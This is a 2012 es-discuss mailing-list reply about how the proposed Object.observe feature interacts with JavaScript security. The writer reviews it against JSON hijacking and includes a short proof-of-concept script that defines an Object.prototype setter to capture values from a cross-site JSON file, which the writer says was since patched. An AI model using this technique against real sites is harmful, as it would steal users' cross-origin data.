Experimental implementation of Object.observe & JS Utility library now available

gaz Heyes gazheyes at gmail.com
Fri Aug 17 06:21:33 PDT 2012


On 17 August 2012 13:47, Rafael Weinstein <rafaelw at chromium.org> wrote:

> Hi gaz,
>
> Thanks so much for your time.
>
> Much care has been taking with this proposal to ensure that it is
> neutral with respect to the existing JS Object/Security model.
>
> As I understand it, the core vulnerability with JSON hacking is the
> ability to define getters on the Object prototype. Object.observe()
> does not affect that ability.
>

The original attack I'm talking about is this:
//variant of the "I know what your friends did last summer" attack
//
http://www.thespanner.co.uk/2009/01/07/i-know-what-your-friends-did-last-summer/
<script>
Object.defineProperty(Object.prototype, "x", {
 set:function(val){
   alert(val);
 }
});
</script>
<script src="//some.external.site/friends.json"></script>
<!-- friends.json contains [{"x":"stolen"}] -->

This was patched to prevent the setter being called on a new object literal
but I guess if the observable stuff doesn't account for this then it's a
problem. It seems like you account for this which is cool.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.mozilla.org/pipermail/es-discuss/attachments/20120817/5035196a/attachment.html>


More information about the es-discuss mailing list